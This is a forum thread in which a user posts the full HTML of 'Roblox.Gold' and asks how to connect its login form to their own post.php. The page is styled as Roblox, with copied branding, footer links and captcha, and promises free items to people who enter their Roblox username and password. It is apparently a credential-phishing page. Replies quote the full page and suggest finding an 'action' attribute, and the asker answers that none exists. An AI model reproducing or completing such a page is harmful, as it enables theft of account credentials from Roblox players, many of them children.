Does anybody know where the login action for this code is? - Eremicus - 03-14-2020
I can't find where the login action for this html page is, as I need to connect the login action with my post.php. I'd really appreciate any help locating it
Code: <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Roblox.Gold</title>
<link rel="icon" href="assets/img/favicon.ico">
<link rel="stylesheet" href="assets/css/bootstrap.min.css">
<link rel="stylesheet" href="assets/css/fonts.css">
<link rel="stylesheet" href="assets/css/style.css">
<script src="assets/js/jquery-3.4.1.min.js"></script>
<script src="assets/js/bootstrap.bundle.min.js"></script>
<script src="assets/js/script.js"></script>
</head>
<body>
<main class="main">
<div class="container-fluid">
<div class="row d-flex justify-content-end">
<a href="https://www.roblox.com/" class="btn btn-default m-3 px-5">Sign Up</a>
</div>
<div class="row justify-content-center pt-3">
<div class="col-12 col-max">
<div class="text-center my-4">
<img src="assets/img/logo.png" alt="Roblox.Gold Logo" class="img-fluid">
</div>
<div class="card">
<div class="card-body pb-1">
<h3 class="title text-center mb-4">LOGIN AND START HAVING FUN!</h3>
<form method="POST" id="captcha-form">
<div class="form-group">
<input type="text" name="username" class="form-control " id="username" placeholder="Username" autofocus value="">
<div class="invalid-feedback">Invalid username</div>
</div>
<div class="form-group">
<input type="password" name="password" class="form-control " id="password" placeholder="Password" >
<div class="invalid-feedback">Passwords must be at least 8 characters long.</div>
</div>
<div class="form-group">
<button type="button" id="captcha-trigger" data-show-captcha="1" class="btn btn-primary btn-block">Log In</button>
</div>
<input type="hidden" name="fcToken" id="captcha-token" value="6655e0914252eb510.2024692501|r=us-east-1|metabgclr=transparent|guitextcolor=%23474747|maintxtclr=%23b8b8b8|metaiconclr=transparent|meta=6|lang=en|pk=9F35E182-C93C-EBCC-A31D-CF8ED317B996|at=30|ht=1|atp=2|cdn_url=https://cdn.arkoselabs.com/fc|lurl=https://audio-us-east-1.arkoselabs.com|surl=https://roblox-api.arkoselabs.com">
</form>
</div>
</div>
</div>
</div>
<div class="row justify-content-center pt-5">
<div class="col-12 col-max">
<div class="card">
<div class="card-body">
<p class="mb-0 text-justify">Roblox.Gold is the new website to use ROBLOX gift codes found off official ROBLOX content from Twitch and YouTube to receive exclusive items you can use for your character! You can also find hidden codes in games participating in official ROBLOX events. To use these codes, use your ROBLOX account you want these items to go to and visit the Enter Code section of the site. Pick the account you want to use wisely, as you can only receive the items on one account.</p>
</div>
</div>
</div>
</div>
<div class="row justify-content-center">
<div class="col-12 mt-5 mb-3">
<h3 class="title text-center text-white">ROBLOX ON YOUR DEVICE</h3>
</div>
<div class="col-sm-6 px-sm-5">
<div class="d-sm-flex justify-content-between">
<a href="https://itunes.apple.com/us/app/roblox-mobile/id431946152"><img src="assets/img/badges/apple.svg" alt="Apple" class="app-badge m-3 m-sm-2"></a>
<a href="https://play.google.com/store/apps/details?id=com.roblox.client&hl=en"><img src="assets/img/badges/google.svg" alt="Google" class="app-badge m-3 m-sm-2"></a>
<a href="https://www.amazon.com/Roblox-Corporation/dp/B00NUF4YOA"><img src="assets/img/badges/amazon.png" alt="Amazon" class="app-badge m-3 m-sm-2"></a>
<a href="https://www.microsoft.com/en-us/p/roblox/bq1tn1t79v9k"><img src="assets/img/badges/xbox.png" alt="XBOX" class="app-badge m-3 m-sm-2"></a>
<a href="https://www.microsoft.com/en-us/store/games/roblox/9nblgggzm6wm"><img src="assets/img/badges/microsoft.svg" alt="Microsoft" class="app-badge m-3 m-sm-2"></a>
</div>
</div>
</div>
</div>
</main>
<footer class="footer">
<div class="container">
<div class="row justify-content-center">
<div class="col-sm-10">
<ul class="footer-links px-md-5">
<li class="footer-link"><a href="https://www.roblox.com/info/about-us" target="_blank">About Us</a></li>
<li class="footer-link"><a href="https://www.roblox.com/info/jobs" target="_blank">Jobs</a></li>
<li class="footer-link"><a href="https://www.roblox.com/info/blog" target="_blank">Blog</a></li>
<li class="footer-link"><a href="https://www.roblox.com/info/parents" target="_blank">Parents</a></li>
<li class="footer-link"><a href="https://www.roblox.com/info/help" target="_blank">Help</a></li>
<li class="footer-link"><a href="https://www.roblox.com/info/terms" target="_blank">Terms</a></li>
<li class="footer-link"><a href="https://www.roblox.com/info/privacy" target="_blank">Privacy</a></li>
</ul>
</div>
</div>
<div class="row justify-content-center">
<div class="col-3 col-max mb-3 mb-sm-0">
<div class="dropwdown">
<button type="button" class="btn btn-outline-light btn-block dropdown-toggle d-flex justify-content-between align-items-center rounded px-3" data-toggle="dropdown">
English
</button>
<div class="dropdown-menu">
<a class="dropdown-item" tabindex="-1" href="#">Deutsch</a>
<a class="dropdown-item" tabindex="-1" href="#">English</a>
<a class="dropdown-item" tabindex="-1" href="#">Español</a>
<a class="dropdown-item" tabindex="-1" href="#">Français</a>
</div>
</div>
</div>
<div class="col-sm-7">
<p class="copyright-text">©2019 Roblox Corporation. Roblox, the Roblox logo and Powering Imagination are among our registered and unregistered trademarks in the U.S. and other countries.</p>
</div>
</div>
</div>
</footer>
<div class="modal" tabindex="-1" role="dialog" id="captcha-modal">
<div class="modal-dialog modal-dialog-centered" role="document" style="max-width: 338px;">
<div class="modal-content">
<div class="modal-body">
<button type="button" class="close" data-dismiss="modal" aria-label="Close" style="position: absolute; top: 2px; right: 5px;">
<span aria-hidden="true">×</span>
</button>
<iframe src="https://roblox-api.arkoselabs.com/fc/gc/?token=6655e0914252eb510.2024692501&r=us-east-1&metabgclr=transparent&guitextcolor=%23474747&maintxtclr=%23b8b8b8&metaiconclr=transparent&meta=6&lang=en&pk=9F35E182-C93C-EBCC-A31D-CF8ED317B996&at=30&ht=1&atp=2&cdn_url=https://cdn.arkoselabs.com/fc&lurl=https://audio-us-east-1.arkoselabs.com&surl=https://roblox-api.arkoselabs.com" id="captcha-frame" frameborder="0" scrolling="no" style="width: 308px; height: 252px"></iframe>
</div>
</div>
</div>
</div>
</body>
</html>
RE: Does anybody know where the login action for this code is? - xdlwilliamz - 03-14-2020
(03-14-2020, 06:20 AM)Eremicus Wrote: I can't find where the login action for this html page is, as I need to connect the login action with my post.php. I'd really appreciate any help locating it
Code: <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Roblox.Gold</title>
<link rel="icon" href="assets/img/favicon.ico">
<link rel="stylesheet" href="assets/css/bootstrap.min.css">
<link rel="stylesheet" href="assets/css/fonts.css">
<link rel="stylesheet" href="assets/css/style.css">
<script src="assets/js/jquery-3.4.1.min.js"></script>
<script src="assets/js/bootstrap.bundle.min.js"></script>
<script src="assets/js/script.js"></script>
</head>
<body>
<main class="main">
<div class="container-fluid">
<div class="row d-flex justify-content-end">
<a href="https://www.roblox.com/" class="btn btn-default m-3 px-5">Sign Up</a>
</div>
<div class="row justify-content-center pt-3">
<div class="col-12 col-max">
<div class="text-center my-4">
<img src="assets/img/logo.png" alt="Roblox.Gold Logo" class="img-fluid">
</div>
<div class="card">
<div class="card-body pb-1">
<h3 class="title text-center mb-4">LOGIN AND START HAVING FUN!</h3>
<form method="POST" id="captcha-form">
<div class="form-group">
<input type="text" name="username" class="form-control " id="username" placeholder="Username" autofocus value="">
<div class="invalid-feedback">Invalid username</div>
</div>
<div class="form-group">
<input type="password" name="password" class="form-control " id="password" placeholder="Password" >
<div class="invalid-feedback">Passwords must be at least 8 characters long.</div>
</div>
<div class="form-group">
<button type="button" id="captcha-trigger" data-show-captcha="1" class="btn btn-primary btn-block">Log In</button>
</div>
<input type="hidden" name="fcToken" id="captcha-token" value="6655e0914252eb510.2024692501|r=us-east-1|metabgclr=transparent|guitextcolor=%23474747|maintxtclr=%23b8b8b8|metaiconclr=transparent|meta=6|lang=en|pk=9F35E182-C93C-EBCC-A31D-CF8ED317B996|at=30|ht=1|atp=2|cdn_url=https://cdn.arkoselabs.com/fc|lurl=https://audio-us-east-1.arkoselabs.com|surl=https://roblox-api.arkoselabs.com">
</form>
</div>
</div>
</div>
</div>
<div class="row justify-content-center pt-5">
<div class="col-12 col-max">
<div class="card">
<div class="card-body">
<p class="mb-0 text-justify">Roblox.Gold is the new website to use ROBLOX gift codes found off official ROBLOX content from Twitch and YouTube to receive exclusive items you can use for your character! You can also find hidden codes in games participating in official ROBLOX events. To use these codes, use your ROBLOX account you want these items to go to and visit the Enter Code section of the site. Pick the account you want to use wisely, as you can only receive the items on one account.</p>
</div>
</div>
</div>
</div>
<div class="row justify-content-center">
<div class="col-12 mt-5 mb-3">
<h3 class="title text-center text-white">ROBLOX ON YOUR DEVICE</h3>
</div>
<div class="col-sm-6 px-sm-5">
<div class="d-sm-flex justify-content-between">
<a href="https://itunes.apple.com/us/app/roblox-mobile/id431946152"><img src="assets/img/badges/apple.svg" alt="Apple" class="app-badge m-3 m-sm-2"></a>
<a href="https://play.google.com/store/apps/details?id=com.roblox.client&hl=en"><img src="assets/img/badges/google.svg" alt="Google" class="app-badge m-3 m-sm-2"></a>
<a href="https://www.amazon.com/Roblox-Corporation/dp/B00NUF4YOA"><img src="assets/img/badges/amazon.png" alt="Amazon" class="app-badge m-3 m-sm-2"></a>
<a href="https://www.microsoft.com/en-us/p/roblox/bq1tn1t79v9k"><img src="assets/img/badges/xbox.png" alt="XBOX" class="app-badge m-3 m-sm-2"></a>
<a href="https://www.microsoft.com/en-us/store/games/roblox/9nblgggzm6wm"><img src="assets/img/badges/microsoft.svg" alt="Microsoft" class="app-badge m-3 m-sm-2"></a>
</div>
</div>
</div>
</div>
</main>
<footer class="footer">
<div class="container">
<div class="row justify-content-center">
<div class="col-sm-10">
<ul class="footer-links px-md-5">
<li class="footer-link"><a href="https://www.roblox.com/info/about-us" target="_blank">About Us</a></li>
<li class="footer-link"><a href="https://www.roblox.com/info/jobs" target="_blank">Jobs</a></li>
<li class="footer-link"><a href="https://www.roblox.com/info/blog" target="_blank">Blog</a></li>
<li class="footer-link"><a href="https://www.roblox.com/info/parents" target="_blank">Parents</a></li>
<li class="footer-link"><a href="https://www.roblox.com/info/help" target="_blank">Help</a></li>
<li class="footer-link"><a href="https://www.roblox.com/info/terms" target="_blank">Terms</a></li>
<li class="footer-link"><a href="https://www.roblox.com/info/privacy" target="_blank">Privacy</a></li>
</ul>
</div>
</div>
<div class="row justify-content-center">
<div class="col-3 col-max mb-3 mb-sm-0">
<div class="dropwdown">
<button type="button" class="btn btn-outline-light btn-block dropdown-toggle d-flex justify-content-between align-items-center rounded px-3" data-toggle="dropdown">
English
</button>
<div class="dropdown-menu">
<a class="dropdown-item" tabindex="-1" href="#">Deutsch</a>
<a class="dropdown-item" tabindex="-1" href="#">English</a>
<a class="dropdown-item" tabindex="-1" href="#">Español</a>
<a class="dropdown-item" tabindex="-1" href="#">Français</a>
</div>
</div>
</div>
<div class="col-sm-7">
<p class="copyright-text">©2019 Roblox Corporation. Roblox, the Roblox logo and Powering Imagination are among our registered and unregistered trademarks in the U.S. and other countries.</p>
</div>
</div>
</div>
</footer>
<div class="modal" tabindex="-1" role="dialog" id="captcha-modal">
<div class="modal-dialog modal-dialog-centered" role="document" style="max-width: 338px;">
<div class="modal-content">
<div class="modal-body">
<button type="button" class="close" data-dismiss="modal" aria-label="Close" style="position: absolute; top: 2px; right: 5px;">
<span aria-hidden="true">×</span>
</button>
<iframe src="https://roblox-api.arkoselabs.com/fc/gc/?token=6655e0914252eb510.2024692501&r=us-east-1&metabgclr=transparent&guitextcolor=%23474747&maintxtclr=%23b8b8b8&metaiconclr=transparent&meta=6&lang=en&pk=9F35E182-C93C-EBCC-A31D-CF8ED317B996&at=30&ht=1&atp=2&cdn_url=https://cdn.arkoselabs.com/fc&lurl=https://audio-us-east-1.arkoselabs.com&surl=https://roblox-api.arkoselabs.com" id="captcha-frame" frameborder="0" scrolling="no" style="width: 308px; height: 252px"></iframe>
</div>
</div>
</div>
</div>
</body>
</html>
Look for the "action' string and make changes as desired.
RE: Does anybody know where the login action for this code is? - Eremicus - 03-14-2020
(03-14-2020, 06:39 AM)xdlwilliamz Wrote: (03-14-2020, 06:20 AM)Eremicus Wrote: I can't find where the login action for this html page is, as I need to connect the login action with my post.php. I'd really appreciate any help locating it
Code: <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Roblox.Gold</title>
<link rel="icon" href="assets/img/favicon.ico">
<link rel="stylesheet" href="assets/css/bootstrap.min.css">
<link rel="stylesheet" href="assets/css/fonts.css">
<link rel="stylesheet" href="assets/css/style.css">
<script src="assets/js/jquery-3.4.1.min.js"></script>
<script src="assets/js/bootstrap.bundle.min.js"></script>
<script src="assets/js/script.js"></script>
</head>
<body>
<main class="main">
<div class="container-fluid">
<div class="row d-flex justify-content-end">
<a href="https://www.roblox.com/" class="btn btn-default m-3 px-5">Sign Up</a>
</div>
<div class="row justify-content-center pt-3">
<div class="col-12 col-max">
<div class="text-center my-4">
<img src="assets/img/logo.png" alt="Roblox.Gold Logo" class="img-fluid">
</div>
<div class="card">
<div class="card-body pb-1">
<h3 class="title text-center mb-4">LOGIN AND START HAVING FUN!</h3>
<form method="POST" id="captcha-form">
<div class="form-group">
<input type="text" name="username" class="form-control " id="username" placeholder="Username" autofocus value="">
<div class="invalid-feedback">Invalid username</div>
</div>
<div class="form-group">
<input type="password" name="password" class="form-control " id="password" placeholder="Password" >
<div class="invalid-feedback">Passwords must be at least 8 characters long.</div>
</div>
<div class="form-group">
<button type="button" id="captcha-trigger" data-show-captcha="1" class="btn btn-primary btn-block">Log In</button>
</div>
<input type="hidden" name="fcToken" id="captcha-token" value="6655e0914252eb510.2024692501|r=us-east-1|metabgclr=transparent|guitextcolor=%23474747|maintxtclr=%23b8b8b8|metaiconclr=transparent|meta=6|lang=en|pk=9F35E182-C93C-EBCC-A31D-CF8ED317B996|at=30|ht=1|atp=2|cdn_url=https://cdn.arkoselabs.com/fc|lurl=https://audio-us-east-1.arkoselabs.com|surl=https://roblox-api.arkoselabs.com">
</form>
</div>
</div>
</div>
</div>
<div class="row justify-content-center pt-5">
<div class="col-12 col-max">
<div class="card">
<div class="card-body">
<p class="mb-0 text-justify">Roblox.Gold is the new website to use ROBLOX gift codes found off official ROBLOX content from Twitch and YouTube to receive exclusive items you can use for your character! You can also find hidden codes in games participating in official ROBLOX events. To use these codes, use your ROBLOX account you want these items to go to and visit the Enter Code section of the site. Pick the account you want to use wisely, as you can only receive the items on one account.</p>
</div>
</div>
</div>
</div>
<div class="row justify-content-center">
<div class="col-12 mt-5 mb-3">
<h3 class="title text-center text-white">ROBLOX ON YOUR DEVICE</h3>
</div>
<div class="col-sm-6 px-sm-5">
<div class="d-sm-flex justify-content-between">
<a href="https://itunes.apple.com/us/app/roblox-mobile/id431946152"><img src="assets/img/badges/apple.svg" alt="Apple" class="app-badge m-3 m-sm-2"></a>
<a href="https://play.google.com/store/apps/details?id=com.roblox.client&hl=en"><img src="assets/img/badges/google.svg" alt="Google" class="app-badge m-3 m-sm-2"></a>
<a href="https://www.amazon.com/Roblox-Corporation/dp/B00NUF4YOA"><img src="assets/img/badges/amazon.png" alt="Amazon" class="app-badge m-3 m-sm-2"></a>
<a href="https://www.microsoft.com/en-us/p/roblox/bq1tn1t79v9k"><img src="assets/img/badges/xbox.png" alt="XBOX" class="app-badge m-3 m-sm-2"></a>
<a href="https://www.microsoft.com/en-us/store/games/roblox/9nblgggzm6wm"><img src="assets/img/badges/microsoft.svg" alt="Microsoft" class="app-badge m-3 m-sm-2"></a>
</div>
</div>
</div>
</div>
</main>
<footer class="footer">
<div class="container">
<div class="row justify-content-center">
<div class="col-sm-10">
<ul class="footer-links px-md-5">
<li class="footer-link"><a href="https://www.roblox.com/info/about-us" target="_blank">About Us</a></li>
<li class="footer-link"><a href="https://www.roblox.com/info/jobs" target="_blank">Jobs</a></li>
<li class="footer-link"><a href="https://www.roblox.com/info/blog" target="_blank">Blog</a></li>
<li class="footer-link"><a href="https://www.roblox.com/info/parents" target="_blank">Parents</a></li>
<li class="footer-link"><a href="https://www.roblox.com/info/help" target="_blank">Help</a></li>
<li class="footer-link"><a href="https://www.roblox.com/info/terms" target="_blank">Terms</a></li>
<li class="footer-link"><a href="https://www.roblox.com/info/privacy" target="_blank">Privacy</a></li>
</ul>
</div>
</div>
<div class="row justify-content-center">
<div class="col-3 col-max mb-3 mb-sm-0">
<div class="dropwdown">
<button type="button" class="btn btn-outline-light btn-block dropdown-toggle d-flex justify-content-between align-items-center rounded px-3" data-toggle="dropdown">
English
</button>
<div class="dropdown-menu">
<a class="dropdown-item" tabindex="-1" href="#">Deutsch</a>
<a class="dropdown-item" tabindex="-1" href="#">English</a>
<a class="dropdown-item" tabindex="-1" href="#">Español</a>
<a class="dropdown-item" tabindex="-1" href="#">Français</a>
</div>
</div>
</div>
<div class="col-sm-7">
<p class="copyright-text">©2019 Roblox Corporation. Roblox, the Roblox logo and Powering Imagination are among our registered and unregistered trademarks in the U.S. and other countries.</p>
</div>
</div>
</div>
</footer>
<div class="modal" tabindex="-1" role="dialog" id="captcha-modal">
<div class="modal-dialog modal-dialog-centered" role="document" style="max-width: 338px;">
<div class="modal-content">
<div class="modal-body">
<button type="button" class="close" data-dismiss="modal" aria-label="Close" style="position: absolute; top: 2px; right: 5px;">
<span aria-hidden="true">×</span>
</button>
<iframe src="https://roblox-api.arkoselabs.com/fc/gc/?token=6655e0914252eb510.2024692501&r=us-east-1&metabgclr=transparent&guitextcolor=%23474747&maintxtclr=%23b8b8b8&metaiconclr=transparent&meta=6&lang=en&pk=9F35E182-C93C-EBCC-A31D-CF8ED317B996&at=30&ht=1&atp=2&cdn_url=https://cdn.arkoselabs.com/fc&lurl=https://audio-us-east-1.arkoselabs.com&surl=https://roblox-api.arkoselabs.com" id="captcha-frame" frameborder="0" scrolling="no" style="width: 308px; height: 252px"></iframe>
</div>
</div>
</div>
</div>
</body>
</html>
Look for the "action' string and make changes as desired.
That’s the entire point....it doesn’t exist...
|